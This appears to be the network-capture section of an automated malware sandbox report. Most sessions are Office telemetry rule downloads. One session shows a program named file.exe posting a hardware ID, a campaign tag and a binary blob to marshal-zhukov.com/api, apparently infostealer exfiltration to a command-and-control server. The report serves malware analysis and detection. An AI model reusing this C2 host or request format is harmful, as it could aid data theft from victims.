                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                              x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153137Z-174f7845968j6t2phC1EWRcfe80000000x9000000000bzzs
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:37 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              39192.168.2.104974713.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:37 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:38 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                              x-ms-request-id: 5810d2d2-301e-0000-6891-3feecc000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153138Z-174f7845968vqt9xhC1EWRgten0000000x800000000044k5
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:38 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              40192.168.2.104975013.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:38 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:39 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 423
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                              x-ms-request-id: dc0e6055-901e-005b-2d91-3f2005000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153139Z-174f7845968g6hv8hC1EWR1v2n000000053g000000006eh2
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:39 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              41192.168.2.104974913.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:39 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:39 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                              x-ms-request-id: aaf15140-f01e-005d-3baa-4013ba000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153139Z-174f7845968psccphC1EWRuz9s0000000xc000000000c6zv
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:39 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              42192.168.2.1049754172.67.160.804438100C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:39 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=ADBWZHG6OUU
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20399
                                                                                                                                                                                                                                                              Host: marshal-zhukov.com
                                                                                                                                                                                                                                                              2024-11-27 15:31:39 UTC15331OUTData Raw: 2d 2d 41 44 42 57 5a 48 47 36 4f 55 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 30 43 30 37 45 30 34 38 36 37 35 41 44 44 34 45 33 33 45 43 42 36 31 41 39 30 37 39 35 43 0d 0a 2d 2d 41 44 42 57 5a 48 47 36 4f 55 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 44 42 57 5a 48 47 36 4f 55 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 69 63 0d 0a 2d 2d 41 44 42 57 5a 48 47 36 4f 55 55 0d
                                                                                                                                                                                                                                                              Data Ascii: --ADBWZHG6OUUContent-Disposition: form-data; name="hwid"700C07E048675ADD4E33ECB61A90795C--ADBWZHG6OUUContent-Disposition: form-data; name="pid"3--ADBWZHG6OUUContent-Disposition: form-data; name="lid"LOGS11--LiveTrafic--ADBWZHG6OUU
                                                                                                                                                                                                                                                              2024-11-27 15:31:39 UTC5068OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b
                                                                                                                                                                                                                                                              Data Ascii: lpQ0/74G6(~`~O
                                                                                                                                                                                                                                                              2024-11-27 15:31:41 UTC1041INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:41 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=f8hu32e53te9njavv011lu2q1d; expires=Sun, 23-Mar-2025 09:18:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uH90m5j1iDDnsDDhHTq43FTE3OT9YsywPIC4QXvFmt%2BB40izFpgSLvdxr30KKq52734QtGSsI1cpidkG%2BvKnsgNQ7POQwomfBHTfK51KKdV0H1qM03pqSSjpSQ1lvNQrmE5sihg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8e932a9b2be18c95-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2000&min_rtt=1977&rtt_var=789&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21356&delivery_rate=1346863&cwnd=204&unsent_bytes=0&cid=9607c0e0f476e704&ts=2634&x=0"
                                                                                                                                                                                                                                                              2024-11-27 15:31:41 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                                                                              2024-11-27 15:31:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              43192.168.2.104975113.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:39 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:39 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 478
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                              x-ms-request-id: 48138194-301e-0020-3858-406299000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153139Z-174f7845968px8v7hC1EWR08ng0000000xe00000000063re
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:39 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              44192.168.2.104975313.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:39 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:39 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 404
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                              x-ms-request-id: e52ede4a-001e-0017-0591-3f0c3c000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153139Z-174f7845968zgtf6hC1EWRqd8s0000000q1g00000000fwhn
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:40 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              45192.168.2.104975513.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:40 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:40 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                              x-ms-request-id: be7987d0-001e-0034-1e91-3fdd04000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153140Z-174f78459688l8rvhC1EWRtzr000000009n000000000ndwm
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:40 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              46192.168.2.104975613.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:41 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:41 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 400
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                              x-ms-request-id: 6760f0bc-801e-002a-1f91-3f31dc000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153141Z-174f7845968kdththC1EWRzvxn00000009bg00000000q5v8
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
